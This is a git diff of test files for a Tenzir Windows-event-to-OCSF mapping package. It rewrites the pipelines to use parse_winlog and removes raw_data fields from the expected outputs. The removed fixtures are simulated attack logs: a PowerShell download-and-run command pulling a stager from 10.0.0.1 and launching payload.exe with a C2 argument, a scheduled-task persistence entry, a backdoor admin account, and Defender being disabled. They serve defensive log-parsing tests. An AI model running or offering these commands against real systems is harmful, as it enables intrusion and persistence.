@@ -31,8 +31,6 @@ ], version: "1.8.0", }, - raw_data: "\n \n \n 4104\n 1\n 3\n 2\n 0x0\n \n 20104\n \n \n Microsoft-Windows-PowerShell/Operational\n WINHOST01.corp.local\n \n \n 1\n 1\n IEX (New-Object Net.WebClient).DownloadString('http://10.0.0.1/stager.ps1'); Start-Process -FilePath 'C:\\tmp\\payload.exe' -ArgumentList '--c2 10.0.0.1' -WindowStyle Hidden\n {f3a1b2c3-d4e5-6f7a-8b9c-0d1e2f3a4b5c}\n \n \n\n", - raw_data_size: 1061, script: { type: "PowerShell", type_id: 2, diff --git a/microsoft/tests/ocsf/eid-4105.tql b/microsoft/tests/ocsf/eid-4105.tql index e7ed9d1..f7042be 100644 --- a/microsoft/tests/ocsf/eid-4105.tql +++ b/microsoft/tests/ocsf/eid-4105.tql @@ -1,7 +1,8 @@ from_file f"{env("TENZIR_INPUTS")}/eid-4105.xml" { read_all } -microsoft::ocsf::map data +this = data.parse_winlog() +microsoft::windows::ocsf::map ocsf::derive ocsf::cast diff --git a/microsoft/tests/ocsf/eid-4105.txt b/microsoft/tests/ocsf/eid-4105.txt index 59d0611..48a12cb 100644 --- a/microsoft/tests/ocsf/eid-4105.txt +++ b/microsoft/tests/ocsf/eid-4105.txt @@ -36,8 +36,6 @@ ], version: "1.8.0", }, - raw_data: "\n \n \n 4105\n 1\n 5\n 2\n 0x0\n \n 20105\n \n \n Microsoft-Windows-PowerShell/Operational\n WINHOST01.corp.local\n \n \n {f3a1b2c3-d4e5-6f7a-8b9c-0d1e2f3a4b5c}\n {a1b2c3d4-e5f6-7a8b-9c0d-1e2f3a4b5c6d}\n \n\n", - raw_data_size: 837, script: { type: "PowerShell", type_id: 2, diff --git a/microsoft/tests/ocsf/eid-4106.tql b/microsoft/tests/ocsf/eid-4106.tql index 0278912..11ac110 100644 --- a/microsoft/tests/ocsf/eid-4106.tql +++ b/microsoft/tests/ocsf/eid-4106.tql @@ -1,7 +1,8 @@ from_file f"{env("TENZIR_INPUTS")}/eid-4106.xml" { read_all } -microsoft::ocsf::map data +this = data.parse_winlog() +microsoft::windows::ocsf::map ocsf::derive ocsf::cast diff --git a/microsoft/tests/ocsf/eid-4106.txt b/microsoft/tests/ocsf/eid-4106.txt index 3f4972f..eaf1ed0 100644 --- a/microsoft/tests/ocsf/eid-4106.txt +++ b/microsoft/tests/ocsf/eid-4106.txt 
@@ -36,8 +36,6 @@ ], version: "1.8.0", }, - raw_data: "\n \n \n 4106\n 1\n 5\n 2\n 0x0\n \n 20106\n \n \n Microsoft-Windows-PowerShell/Operational\n WINHOST01.corp.local\n \n \n {f3a1b2c3-d4e5-6f7a-8b9c-0d1e2f3a4b5c}\n {a1b2c3d4-e5f6-7a8b-9c0d-1e2f3a4b5c6d}\n \n\n", - raw_data_size: 837, script: { type: "PowerShell", type_id: 2, diff --git a/microsoft/tests/ocsf/eid-4624.tql b/microsoft/tests/ocsf/eid-4624.tql index 1f5407a..d89f11a 100644 --- a/microsoft/tests/ocsf/eid-4624.tql +++ b/microsoft/tests/ocsf/eid-4624.tql @@ -1,7 +1,8 @@ from_file f"{env("TENZIR_INPUTS")}/eid-4624.xml" { read_all } -microsoft::ocsf::map data +this = data.parse_winlog() +microsoft::windows::ocsf::map ocsf::derive ocsf::cast diff --git a/microsoft/tests/ocsf/eid-4624.txt b/microsoft/tests/ocsf/eid-4624.txt index 195b925..622dd88 100644 --- a/microsoft/tests/ocsf/eid-4624.txt +++ b/microsoft/tests/ocsf/eid-4624.txt @@ -45,8 +45,6 @@ ], version: "1.8.0", }, - raw_data: "\n \n \n 4624\n 2\n 0\n 12544\n 0x8020000000000000\n \n 98761\n \n \n Security\n DC01.corp.local\n \n \n S-1-0-0\n -\n -\n 0x0\n S-1-5-21-3107921522-2185401913-891411500-1104\n jdoe\n CORP\n 0xA1B2C3\n 3\n Kerberos\n Kerberos\n -\n {B4C8A1F2-3D9E-4A12-8B7C-1F2E3D4A5B6C}\n -\n -\n 0\n 0x0\n -\n 10.0.0.42\n 49827\n %%1833\n -\n -\n -\n %%1843\n 0x0\n %%1842\n \n\n", - raw_data_size: 1918, session: { uid: "{B4C8A1F2-3D9E-4A12-8B7C-1F2E3D4A5B6C}", uid_alt: "0xA1B2C3", diff --git a/microsoft/tests/ocsf/eid-4625.tql b/microsoft/tests/ocsf/eid-4625.tql index 9d08d78..611473d 100644 --- a/microsoft/tests/ocsf/eid-4625.tql +++ b/microsoft/tests/ocsf/eid-4625.tql @@ -1,7 +1,8 @@ from_file f"{env("TENZIR_INPUTS")}/eid-4625.xml" { read_all } -microsoft::ocsf::map data +this = data.parse_winlog() +microsoft::windows::ocsf::map ocsf::derive ocsf::cast diff --git a/microsoft/tests/ocsf/eid-4625.txt b/microsoft/tests/ocsf/eid-4625.txt index 2116e1c..1311115 100644 --- a/microsoft/tests/ocsf/eid-4625.txt 
+++ b/microsoft/tests/ocsf/eid-4625.txt @@ -45,8 +45,6 @@ ], version: "1.8.0", }, - raw_data: "\n \n \n 4625\n 0\n 0\n 12546\n 0x8020000000000000\n \n 98762\n \n \n Security\n DC01.corp.local\n \n \n S-1-0-0\n -\n -\n 0x0\n S-1-0-0\n Administrator\n CORP\n 0xC000006D\n %%2313\n 0xC000006A\n 3\n NtLmSsp\n NTLM\n WINHOST01\n -\n -\n 0\n 0x0\n -\n 10.0.0.42\n 49827\n \n\n", - raw_data_size: 1569, severity: "Low", severity_id: 2, src_endpoint: { diff --git a/microsoft/tests/ocsf/eid-4648.tql b/microsoft/tests/ocsf/eid-4648.tql index e9ad6ca..af04fb8 100644 --- a/microsoft/tests/ocsf/eid-4648.tql +++ b/microsoft/tests/ocsf/eid-4648.tql @@ -1,7 +1,8 @@ from_file f"{env("TENZIR_INPUTS")}/eid-4648.xml" { read_all } -microsoft::ocsf::map data +this = data.parse_winlog() +microsoft::windows::ocsf::map ocsf::derive ocsf::cast diff --git a/microsoft/tests/ocsf/eid-4648.txt b/microsoft/tests/ocsf/eid-4648.txt index 8988d8e..b70f6cd 100644 --- a/microsoft/tests/ocsf/eid-4648.txt +++ b/microsoft/tests/ocsf/eid-4648.txt @@ -56,8 +56,6 @@ ], version: "1.8.0", }, - raw_data: "\n \n \n 4648\n 0\n 0\n 12544\n 0x8020000000000000\n \n 98763\n \n \n Security\n WINHOST01.corp.local\n \n \n S-1-5-21-3107921522-2185401913-891411500-1104\n jdoe\n CORP\n 0xA1B2C3\n {00000000-0000-0000-0000-000000000000}\n svc_backup\n CORP\n {00000000-0000-0000-0000-000000000000}\n fileserver.corp.local\n fileserver.corp.local\n 0xA1B2C3\n C:\\tmp\\payload.exe\n 10.0.0.1\n 445\n \n\n", - raw_data_size: 1421, severity: "Informational", severity_id: 1, src_endpoint: { diff --git a/microsoft/tests/ocsf/eid-4672.tql b/microsoft/tests/ocsf/eid-4672.tql index 19c7581..3c32717 100644 --- a/microsoft/tests/ocsf/eid-4672.tql +++ b/microsoft/tests/ocsf/eid-4672.tql @@ -1,7 +1,8 @@ from_file f"{env("TENZIR_INPUTS")}/eid-4672.xml" { read_all } -microsoft::ocsf::map data +this = data.parse_winlog() +microsoft::windows::ocsf::map ocsf::derive ocsf::cast 
diff --git a/microsoft/tests/ocsf/eid-4672.txt b/microsoft/tests/ocsf/eid-4672.txt index 6039c93..601b432 100644 --- a/microsoft/tests/ocsf/eid-4672.txt +++ b/microsoft/tests/ocsf/eid-4672.txt @@ -44,8 +44,6 @@ "SeSystemEnvironmentPrivilege", "SeImpersonatePrivilege", ], - raw_data: "\n \n \n 4672\n 0\n 0\n 12548\n 0x8020000000000000\n \n 98762\n \n \n Security\n DC01.corp.local\n \n \n S-1-5-18\n SYSTEM\n NT AUTHORITY\n 0x3e7\n SeAssignPrimaryTokenPrivilege SeTcbPrivilege SeSecurityPrivilege SeTakeOwnershipPrivilege SeLoadDriverPrivilege SeBackupPrivilege SeRestorePrivilege SeDebugPrivilege SeAuditPrivilege SeSystemEnvironmentPrivilege SeImpersonatePrivilege\n \n\n", - raw_data_size: 1086, session: { uid_alt: "0x3e7", }, diff --git a/microsoft/tests/ocsf/eid-4688.tql b/microsoft/tests/ocsf/eid-4688.tql index 38bc3e2..0ed3bb8 100644 --- a/microsoft/tests/ocsf/eid-4688.tql +++ b/microsoft/tests/ocsf/eid-4688.tql @@ -1,7 +1,8 @@ from_file f"{env("TENZIR_INPUTS")}/eid-4688.xml" { read_all } -microsoft::ocsf::map data +this = data.parse_winlog() +microsoft::windows::ocsf::map ocsf::derive ocsf::cast diff --git a/microsoft/tests/ocsf/eid-4688.txt b/microsoft/tests/ocsf/eid-4688.txt index b42a098..5c1900e 100644 --- a/microsoft/tests/ocsf/eid-4688.txt +++ b/microsoft/tests/ocsf/eid-4688.txt @@ -66,8 +66,6 @@ path: "C:\\tmp\\payload.exe", pid: 6732, }, - raw_data: "\n \n \n 4688\n 2\n 0\n 13312\n 0x8020000000000000\n \n 98764\n \n \n Security\n WINHOST01.corp.local\n \n \n S-1-5-21-3107921522-2185401913-891411500-1104\n jdoe\n CORP\n 0xA1B2C3\n 0x1a4c\n C:\\tmp\\payload.exe\n %%1937\n 0x1234\n payload.exe --c2 10.0.0.1\n S-1-0-0\n -\n -\n 0x0\n C:\\Windows\\System32\\wscript.exe\n S-1-16-8192\n \n\n", - raw_data_size: 1429, severity: "Informational", severity_id: 1, status: "Success", diff --git a/microsoft/tests/ocsf/eid-4697.tql b/microsoft/tests/ocsf/eid-4697.tql index c110c07..b702364 100644 --- a/microsoft/tests/ocsf/eid-4697.tql 
+++ b/microsoft/tests/ocsf/eid-4697.tql @@ -1,7 +1,8 @@ from_file f"{env("TENZIR_INPUTS")}/eid-4697.xml" { read_all } -microsoft::ocsf::map data +this = data.parse_winlog() +microsoft::windows::ocsf::map ocsf::derive ocsf::cast diff --git a/microsoft/tests/ocsf/eid-4697.txt b/microsoft/tests/ocsf/eid-4697.txt index 1fd6edf..6b9fa46 100644 --- a/microsoft/tests/ocsf/eid-4697.txt +++ b/microsoft/tests/ocsf/eid-4697.txt @@ -41,8 +41,6 @@ ], version: "1.8.0", }, - raw_data: "\n \n \n 4697\n 0\n 0\n 12289\n 0x8020000000000000\n \n 98765\n \n \n Security\n WINHOST01.corp.local\n \n \n S-1-5-21-3107921522-2185401913-891411500-1104\n jdoe\n CORP\n 0xA1B2C3\n PayloadSvc\n C:\\tmp\\payload.exe --svc\n 0x10\n 2\n LocalSystem\n \n\n", - raw_data_size: 1124, severity: "Informational", severity_id: 1, time: 2024-03-23T12:34:56.789012300Z, diff --git a/microsoft/tests/ocsf/eid-4698.tql b/microsoft/tests/ocsf/eid-4698.tql index 1e4cf62..b29f9eb 100644 --- a/microsoft/tests/ocsf/eid-4698.tql +++ b/microsoft/tests/ocsf/eid-4698.tql @@ -1,7 +1,8 @@ from_file f"{env("TENZIR_INPUTS")}/eid-4698.xml" { read_all } -microsoft::ocsf::map data +this = data.parse_winlog() +microsoft::windows::ocsf::map ocsf::derive ocsf::cast diff --git a/microsoft/tests/ocsf/eid-4698.txt b/microsoft/tests/ocsf/eid-4698.txt index f6e7a8f..975595f 100644 --- a/microsoft/tests/ocsf/eid-4698.txt +++ b/microsoft/tests/ocsf/eid-4698.txt 
@@ -47,8 +47,6 @@ ], version: "1.8.0", }, - raw_data: "\n \n \n 4698\n 0\n 0\n 12804\n 0x8020000000000000\n \n 98766\n \n \n Security\n WINHOST01.corp.local\n \n \n S-1-5-21-3107921522-2185401913-891411500-1104\n jdoe\n CORP\n 0xA1B2C3\n \\Microsoft\\Windows\\UpdateOrchestrator\\payload_persist\n <Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task"><Triggers><BootTrigger><StartBoundary>2024-03-23T12:00:00</StartBoundary><Enabled>true</Enabled></BootTrigger></Triggers><Actions Context="Author"><Exec><Command>C:\\tmp\\payload.exe</Command><Arguments>--c2 10.0.0.1</Arguments></Exec></Actions></Task>\n 720575940379820032\n 0x1a4c\n 0x1234\n 0\n WINHOST01.corp.local\n \n\n", - raw_data_size: 1728, severity: "Informational", severity_id: 1, time: 2024-03-23T12:34:56.789012300Z, diff --git a/microsoft/tests/ocsf/eid-4720.tql b/microsoft/tests/ocsf/eid-4720.tql index 236a9d4..6ce7646 100644 --- a/microsoft/tests/ocsf/eid-4720.tql +++ b/microsoft/tests/ocsf/eid-4720.tql @@ -1,7 +1,8 @@ from_file f"{env("TENZIR_INPUTS")}/eid-4720.xml" { read_all } -microsoft::ocsf::map data +this = data.parse_winlog() +microsoft::windows::ocsf::map ocsf::derive ocsf::cast diff --git a/microsoft/tests/ocsf/eid-4720.txt b/microsoft/tests/ocsf/eid-4720.txt index 45f1280..c2e0b98 100644 --- a/microsoft/tests/ocsf/eid-4720.txt +++ b/microsoft/tests/ocsf/eid-4720.txt @@ -41,8 +41,6 @@ ], version: "1.8.0", }, - raw_data: "\n \n \n 4720\n 0\n 0\n 13824\n 0x8020000000000000\n \n 98767\n \n \n Security\n DC01.corp.local\n \n \n S-1-5-21-3107921522-2185401913-891411500-1104\n jdoe\n CORP\n 0xA1B2C3\n backdoor_svc\n CORP\n S-1-5-21-3107921522-2185401913-891411500-1500\n backdoor_svc\n %%1793\n -\n %%1793\n %%1793\n %%1793\n %%1793\n %%1793\n %%1794\n %%1794\n 513\n -\n 0x0\n 0x15\n %%2080 %%2082 %%2084\n %%1793\n -\n %%1797\n -\n \n\n", - raw_data_size: 1899, severity: "Informational", severity_id: 1, time: 2024-03-23T12:34:56.789012300Z, 
diff --git a/microsoft/tests/ocsf/eid-4722.tql b/microsoft/tests/ocsf/eid-4722.tql index e827a02..97da69e 100644 --- a/microsoft/tests/ocsf/eid-4722.tql +++ b/microsoft/tests/ocsf/eid-4722.tql @@ -1,7 +1,8 @@ from_file f"{env("TENZIR_INPUTS")}/eid-4722.xml" { read_all } -microsoft::ocsf::map data +this = data.parse_winlog() +microsoft::windows::ocsf::map ocsf::derive ocsf::cast diff --git a/microsoft/tests/ocsf/eid-4722.txt b/microsoft/tests/ocsf/eid-4722.txt index 17190f3..8313d16 100644 --- a/microsoft/tests/ocsf/eid-4722.txt +++ b/microsoft/tests/ocsf/eid-4722.txt @@ -41,8 +41,6 @@ ], version: "1.8.0", }, - raw_data: "\n \n \n 4722\n 0\n 0\n 13824\n 0x8020000000000000\n \n 98770\n \n \n Security\n DC01.corp.local\n \n \n S-1-5-21-3107921522-2185401913-891411500-1104\n jdoe\n CORP\n 0xA1B2C3\n backdoor_svc\n CORP\n S-1-5-21-3107921522-2185401913-891411500-1500\n \n\n", - raw_data_size: 1050, severity: "Informational", severity_id: 1, time: 2024-03-23T12:34:56.789012300Z, diff --git a/microsoft/tests/ocsf/eid-4725.tql b/microsoft/tests/ocsf/eid-4725.tql index 11b0dcf..72d581b 100644 --- a/microsoft/tests/ocsf/eid-4725.tql +++ b/microsoft/tests/ocsf/eid-4725.tql @@ -1,7 +1,8 @@ from_file f"{env("TENZIR_INPUTS")}/eid-4725.xml" { read_all } -microsoft::ocsf::map data +this = data.parse_winlog() +microsoft::windows::ocsf::map ocsf::derive ocsf::cast diff --git a/microsoft/tests/ocsf/eid-4725.txt b/microsoft/tests/ocsf/eid-4725.txt index 7032194..2ec1e11 100644 --- a/microsoft/tests/ocsf/eid-4725.txt +++ b/microsoft/tests/ocsf/eid-4725.txt @@ -41,8 +41,6 @@ ], version: "1.8.0", }, - raw_data: "\n \n \n 4725\n 0\n 0\n 13824\n 0x8020000000000000\n \n 98773\n \n \n Security\n DC01.corp.local\n \n \n S-1-5-21-3107921522-2185401913-891411500-1104\n jdoe\n CORP\n 0xA1B2C3\n backdoor_svc\n CORP\n S-1-5-21-3107921522-2185401913-891411500-1500\n \n\n", - raw_data_size: 1050, severity: "Informational", severity_id: 1, time: 2024-03-23T12:34:56.789012300Z, 
diff --git a/microsoft/tests/ocsf/eid-4726.tql b/microsoft/tests/ocsf/eid-4726.tql index 496a205..ef7f4cc 100644 --- a/microsoft/tests/ocsf/eid-4726.tql +++ b/microsoft/tests/ocsf/eid-4726.tql @@ -1,7 +1,8 @@ from_file f"{env("TENZIR_INPUTS")}/eid-4726.xml" { read_all } -microsoft::ocsf::map data +this = data.parse_winlog() +microsoft::windows::ocsf::map ocsf::derive ocsf::cast diff --git a/microsoft/tests/ocsf/eid-4726.txt b/microsoft/tests/ocsf/eid-4726.txt index 87ce402..1cdb6a2 100644 --- a/microsoft/tests/ocsf/eid-4726.txt +++ b/microsoft/tests/ocsf/eid-4726.txt @@ -41,8 +41,6 @@ ], version: "1.8.0", }, - raw_data: "\n \n \n 4726\n 0\n 0\n 13824\n 0x8020000000000000\n \n 98774\n \n \n Security\n DC01.corp.local\n \n \n S-1-5-21-3107921522-2185401913-891411500-1104\n jdoe\n CORP\n 0xA1B2C3\n backdoor_svc\n CORP\n S-1-5-21-3107921522-2185401913-891411500-1500\n -\n \n\n", - raw_data_size: 1090, severity: "Informational", severity_id: 1, time: 2024-03-23T12:34:56.789012300Z, diff --git a/microsoft/tests/ocsf/eid-4728.tql b/microsoft/tests/ocsf/eid-4728.tql index f0049af..f13f6c9 100644 --- a/microsoft/tests/ocsf/eid-4728.tql +++ b/microsoft/tests/ocsf/eid-4728.tql @@ -1,7 +1,8 @@ from_file f"{env("TENZIR_INPUTS")}/eid-4728.xml" { read_all } -microsoft::ocsf::map data +this = data.parse_winlog() +microsoft::windows::ocsf::map ocsf::derive ocsf::cast diff --git a/microsoft/tests/ocsf/eid-4728.txt b/microsoft/tests/ocsf/eid-4728.txt index 1678517..5f2665d 100644 --- a/microsoft/tests/ocsf/eid-4728.txt +++ b/microsoft/tests/ocsf/eid-4728.txt 
@@ -46,8 +46,6 @@ ], version: "1.8.0", }, - raw_data: "\n \n \n 4728\n 0\n 0\n 13826\n 0x8020000000000000\n \n 98776\n \n \n Security\n DC01.corp.local\n \n \n S-1-5-21-3107921522-2185401913-891411500-1104\n jdoe\n CORP\n 0xA1B2C3\n CN=backdoor_svc,CN=Users,DC=corp,DC=local\n S-1-5-21-3107921522-2185401913-891411500-1500\n DomainAdmins\n CORP\n S-1-5-21-3107921522-2185401913-891411500-512\n -\n \n\n", - raw_data_size: 1246, severity: "Informational", severity_id: 1, time: 2024-03-23T12:34:56.789012300Z, diff --git a/microsoft/tests/ocsf/eid-4730.tql b/microsoft/tests/ocsf/eid-4730.tql index 39421c2..504daa0 100644 --- a/microsoft/tests/ocsf/eid-4730.tql +++ b/microsoft/tests/ocsf/eid-4730.tql @@ -1,7 +1,8 @@ from_file f"{env("TENZIR_INPUTS")}/eid-4730.xml" { read_all } -microsoft::ocsf::map data +this = data.parse_winlog() +microsoft::windows::ocsf::map ocsf::derive ocsf::cast diff --git a/microsoft/tests/ocsf/eid-4730.txt b/microsoft/tests/ocsf/eid-4730.txt index c9fdd11..97eb1f7 100644 --- a/microsoft/tests/ocsf/eid-4730.txt +++ b/microsoft/tests/ocsf/eid-4730.txt @@ -46,8 +46,6 @@ ], version: "1.8.0", }, - raw_data: "\n \n \n 4730\n 0\n 0\n 13827\n 0x8020000000000000\n \n 98778\n \n \n Security\n DC01.corp.local\n \n \n S-1-5-21-3107921522-2185401913-891411500-1104\n jdoe\n CORP\n 0xA1B2C3\n OldAdmins\n CORP\n S-1-5-21-3107921522-2185401913-891411500-2000\n -\n \n\n", - raw_data_size: 1087, severity: "Informational", severity_id: 1, time: 2024-03-23T12:34:56.789012300Z, diff --git a/microsoft/tests/ocsf/eid-4732.tql b/microsoft/tests/ocsf/eid-4732.tql index cd590d5..6f20bbb 100644 --- a/microsoft/tests/ocsf/eid-4732.tql +++ b/microsoft/tests/ocsf/eid-4732.tql @@ -1,7 +1,8 @@ from_file f"{env("TENZIR_INPUTS")}/eid-4732.xml" { read_all } -microsoft::ocsf::map data +this = data.parse_winlog() +microsoft::windows::ocsf::map ocsf::derive ocsf::cast diff --git a/microsoft/tests/ocsf/eid-4732.txt b/microsoft/tests/ocsf/eid-4732.txt index d424e03..d7db2d9 100644 
--- a/microsoft/tests/ocsf/eid-4732.txt +++ b/microsoft/tests/ocsf/eid-4732.txt @@ -46,8 +46,6 @@ ], version: "1.8.0", }, - raw_data: "\n \n \n 4732\n 0\n 0\n 13826\n 0x8020000000000000\n \n 98768\n \n \n Security\n WINHOST01.corp.local\n \n \n S-1-5-21-3107921522-2185401913-891411500-1104\n jdoe\n CORP\n 0xA1B2C3\n CN=backdoor_svc,CN=Users,DC=corp,DC=local\n S-1-5-21-3107921522-2185401913-891411500-1500\n Administrators\n Builtin\n S-1-5-32-544\n -\n \n\n", - raw_data_size: 1224, severity: "Informational", severity_id: 1, time: 2024-03-23T12:34:56.789012300Z, diff --git a/microsoft/tests/ocsf/eid-4769.tql b/microsoft/tests/ocsf/eid-4769.tql index 02008ba..a1e5d6d 100644 --- a/microsoft/tests/ocsf/eid-4769.tql +++ b/microsoft/tests/ocsf/eid-4769.tql @@ -1,7 +1,8 @@ from_file f"{env("TENZIR_INPUTS")}/eid-4769.xml" { read_all } -microsoft::ocsf::map data +this = data.parse_winlog() +microsoft::windows::ocsf::map ocsf::derive ocsf::cast diff --git a/microsoft/tests/ocsf/eid-4769.txt b/microsoft/tests/ocsf/eid-4769.txt index a7c572c..b8fb350 100644 --- a/microsoft/tests/ocsf/eid-4769.txt +++ b/microsoft/tests/ocsf/eid-4769.txt @@ -34,8 +34,6 @@ ], version: "1.8.0", }, - raw_data: "\n \n \n 4769\n 0\n 0\n 14337\n 0x8020000000000000\n \n 98769\n \n \n Security\n DC01.corp.local\n \n \n jdoe@CORP.LOCAL\n CORP.LOCAL\n cifs/fileserver.corp.local\n S-1-5-21-3107921522-2185401913-891411500-1103\n 0x40810000\n 0x12\n ::ffff:10.0.0.42\n 49827\n 0x0\n {B4C8A1F2-3D9E-4A12-8B7C-1F2E3D4A5B6C}\n -\n \n\n", - raw_data_size: 1239, session: { uid: "{B4C8A1F2-3D9E-4A12-8B7C-1F2E3D4A5B6C}", }, diff --git a/microsoft/tests/ocsf/eid-4771.tql b/microsoft/tests/ocsf/eid-4771.tql index 8f31e5f..f80b305 100644 --- a/microsoft/tests/ocsf/eid-4771.tql +++ b/microsoft/tests/ocsf/eid-4771.tql @@ -1,7 +1,8 @@ from_file f"{env("TENZIR_INPUTS")}/eid-4771.xml" { read_all } -microsoft::ocsf::map data +this = data.parse_winlog() +microsoft::windows::ocsf::map ocsf::derive ocsf::cast 
diff --git a/microsoft/tests/ocsf/eid-4771.txt b/microsoft/tests/ocsf/eid-4771.txt index 0869d83..8d74b30 100644 --- a/microsoft/tests/ocsf/eid-4771.txt +++ b/microsoft/tests/ocsf/eid-4771.txt @@ -31,8 +31,6 @@ ], version: "1.8.0", }, - raw_data: "\n \n \n 4771\n 0\n 0\n 14339\n 0x8020000000000000\n \n 98770\n \n \n Security\n DC01.corp.local\n \n \n krbtgt\n S-1-5-21-3107921522-2185401913-891411500-502\n krbtgt/CORP.LOCAL\n 0x40810010\n 0x18\n 2\n ::ffff:10.0.0.42\n 49827\n -\n -\n -\n \n\n", - raw_data_size: 1162, severity: "Low", severity_id: 2, src_endpoint: { diff --git a/microsoft/tests/ocsf/eid-4776.tql b/microsoft/tests/ocsf/eid-4776.tql index 476b404..84842a4 100644 --- a/microsoft/tests/ocsf/eid-4776.tql +++ b/microsoft/tests/ocsf/eid-4776.tql @@ -1,7 +1,8 @@ from_file f"{env("TENZIR_INPUTS")}/eid-4776.xml" { read_all } -microsoft::ocsf::map data +this = data.parse_winlog() +microsoft::windows::ocsf::map ocsf::derive ocsf::cast diff --git a/microsoft/tests/ocsf/eid-4776.txt b/microsoft/tests/ocsf/eid-4776.txt index 4c7d402..72b7693 100644 --- a/microsoft/tests/ocsf/eid-4776.txt +++ b/microsoft/tests/ocsf/eid-4776.txt @@ -33,8 +33,6 @@ ], version: "1.8.0", }, - raw_data: "\n \n \n 4776\n 0\n 0\n 14336\n 0x8020000000000000\n \n 98771\n \n \n Security\n DC01.corp.local\n \n \n MICROSOFT_AUTHENTICATION_PACKAGE_V1_0\n Administrator\n WINHOST01\n 0xC000006A\n \n\n", - raw_data_size: 862, severity: "Informational", severity_id: 1, src_endpoint: { diff --git a/microsoft/tests/ocsf/eid-5001.tql b/microsoft/tests/ocsf/eid-5001.tql index 73f76b0..40e51f6 100644 --- a/microsoft/tests/ocsf/eid-5001.tql +++ b/microsoft/tests/ocsf/eid-5001.tql @@ -1,7 +1,8 @@ from_file f"{env("TENZIR_INPUTS")}/eid-5001.xml" { read_all } -microsoft::ocsf::map data +this = data.parse_winlog() +microsoft::windows::ocsf::map ocsf::derive ocsf::cast diff --git a/microsoft/tests/ocsf/eid-5001.txt b/microsoft/tests/ocsf/eid-5001.txt index 87cc570..b176845 100644 
--- a/microsoft/tests/ocsf/eid-5001.txt +++ b/microsoft/tests/ocsf/eid-5001.txt @@ -38,8 +38,6 @@ ], version: "1.8.0", }, - raw_data: "\n \n \n 5001\n 0\n 3\n 0\n 0x8000000000000000\n \n 45001\n \n \n Microsoft-Windows-Windows Defender/Operational\n WINHOST01.corp.local\n \n \n Windows Defender Antivirus\n 4.18.24010.12\n \n\n", - raw_data_size: 779, severity: "High", severity_id: 4, time: 2024-03-23T12:34:56.789012300Z, diff --git a/microsoft/tests/ocsf/eid-5007.tql b/microsoft/tests/ocsf/eid-5007.tql index 8b5a0bd..2d916dc 100644 --- a/microsoft/tests/ocsf/eid-5007.tql +++ b/microsoft/tests/ocsf/eid-5007.tql @@ -1,7 +1,8 @@ from_file f"{env("TENZIR_INPUTS")}/eid-5007.xml" { read_all } -microsoft::ocsf::map data +this = data.parse_winlog() +microsoft::windows::ocsf::map ocsf::derive ocsf::cast diff --git a/microsoft/tests/ocsf/eid-5007.txt b/microsoft/tests/ocsf/eid-5007.txt index 73a61c3..38eb39f 100644 --- a/microsoft/tests/ocsf/eid-5007.txt +++ b/microsoft/tests/ocsf/eid-5007.txt @@ -38,8 +38,6 @@ ], version: "1.8.0", }, - raw_data: "\n \n \n 5007\n 0\n 4\n 0\n 0x8000000000000000\n \n 45007\n \n \n Microsoft-Windows-Windows Defender/Operational\n WINHOST01.corp.local\n \n \n Windows Defender Antivirus\n 4.18.24010.12\n HKLM\\SOFTWARE\\Microsoft\\Windows Defender\\Real-Time Protection\\DisableRealtimeMonitoring = 0x0\n HKLM\\SOFTWARE\\Microsoft\\Windows Defender\\Real-Time Protection\\DisableRealtimeMonitoring = 0x1\n \n\n", - raw_data_size: 1035, severity: "High", severity_id: 4, time: 2024-03-23T12:34:56.789012300Z, diff --git a/microsoft/tests/ocsf/eid-6005.tql b/microsoft/tests/ocsf/eid-6005.tql index 35ffa6b..7125358 100644 --- a/microsoft/tests/ocsf/eid-6005.tql +++ b/microsoft/tests/ocsf/eid-6005.tql @@ -1,7 +1,8 @@ from_file f"{env("TENZIR_INPUTS")}/eid-6005.xml" { read_all } -microsoft::ocsf::map data +this = data.parse_winlog() +microsoft::windows::ocsf::map ocsf::derive ocsf::cast 
diff --git a/microsoft/tests/ocsf/eid-6005.txt b/microsoft/tests/ocsf/eid-6005.txt index a05a29c..a1e0dd4 100644 --- a/microsoft/tests/ocsf/eid-6005.txt +++ b/microsoft/tests/ocsf/eid-6005.txt @@ -31,8 +31,6 @@ ], version: "1.8.0", }, - raw_data: "\n \n \n 6005\n 0\n 4\n 0\n 0x8080000000000000\n \n 1\n \n \n System\n WINHOST01.corp.local\n \n \n The Event log service was started.\n \n\n", - raw_data_size: 591, severity: "Informational", severity_id: 1, time: 2024-03-23T12:34:56.789012300Z, diff --git a/microsoft/tests/ocsf/eid-6006.tql b/microsoft/tests/ocsf/eid-6006.tql index 4718edd..ea2511d 100644 --- a/microsoft/tests/ocsf/eid-6006.tql +++ b/microsoft/tests/ocsf/eid-6006.tql @@ -1,7 +1,8 @@ from_file f"{env("TENZIR_INPUTS")}/eid-6006.xml" { read_all } -microsoft::ocsf::map data +this = data.parse_winlog() +microsoft::windows::ocsf::map ocsf::derive ocsf::cast diff --git a/microsoft/tests/ocsf/eid-6006.txt b/microsoft/tests/ocsf/eid-6006.txt index 156920d..da234e2 100644 --- a/microsoft/tests/ocsf/eid-6006.txt +++ b/microsoft/tests/ocsf/eid-6006.txt @@ -31,8 +31,6 @@ ], version: "1.8.0", }, - raw_data: "\n \n \n 6006\n 0\n 4\n 0\n 0x8080000000000000\n \n 2\n \n \n System\n WINHOST01.corp.local\n \n \n The Event log service was stopped.\n \n\n", - raw_data_size: 591, severity: "Informational", severity_id: 1, time: 2024-03-23T12:34:58.123456700Z, diff --git a/microsoft/tests/ocsf/eid-7034.tql b/microsoft/tests/ocsf/eid-7034.tql index 25fb053..8423e23 100644 --- a/microsoft/tests/ocsf/eid-7034.tql +++ b/microsoft/tests/ocsf/eid-7034.tql @@ -1,7 +1,8 @@ from_file f"{env("TENZIR_INPUTS")}/eid-7034.xml" { read_all } -microsoft::ocsf::map data +this = data.parse_winlog() +microsoft::windows::ocsf::map ocsf::derive ocsf::cast diff --git a/microsoft/tests/ocsf/eid-7034.txt b/microsoft/tests/ocsf/eid-7034.txt index 34c3442..f65ca69 100644 --- a/microsoft/tests/ocsf/eid-7034.txt +++ b/microsoft/tests/ocsf/eid-7034.txt 
